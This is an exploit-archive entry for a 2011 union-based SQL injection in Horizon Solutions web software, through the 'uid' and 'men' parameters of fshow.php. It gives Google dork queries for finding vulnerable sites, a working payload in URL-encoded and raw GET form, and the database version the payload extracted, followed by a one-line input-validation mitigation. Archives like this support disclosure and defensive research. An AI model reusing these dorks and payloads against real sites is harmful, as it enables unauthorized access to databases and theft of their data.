Horizon SQLi

vendor:

Horizon

by:

Iolo Morganwg

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Horizon

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: a:horizonsolutions:horizon

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2011

The Horizon Solutions website is vulnerable to union based SQL injection. Both the 'uid' and 'men' parameters are vulnerable. An example of an encoded URL exploit is '/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20'. An example of an un-encoded URL exploit is 'GET /fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS CHAR),CHAR(32)),CHAR(58,99,105,99,58))# HTTP/1.1'. The query answer is '5.1.55-log:cic:'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Horizon SQLi
# Google Dork: intext:"Site by Horizon"
#            : inurl:"uid=HORIZON3"
# Date: 03/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.horizonsolutions.tv/
# Notes: Both params are vulnerable to union based sqli

# Encoded (URL) Example
/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20

# Un-Encoded Example
GET /fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT
CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS
CHAR),CHAR(32)),CHAR(58,99,105,99,58))#  HTTP/1.1

# Query Answer
5.1.55-log